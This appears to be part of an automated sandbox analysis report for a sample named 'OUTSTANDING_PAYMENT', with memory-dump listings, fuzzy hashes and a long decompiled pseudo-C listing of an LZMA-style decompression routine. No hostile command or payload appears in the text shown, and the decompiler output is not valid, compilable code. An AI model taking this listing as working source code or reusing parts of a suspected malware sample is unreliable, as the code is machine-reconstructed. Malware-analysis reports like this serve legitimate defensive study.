                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                                                        • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                                                                        • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                                                        • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
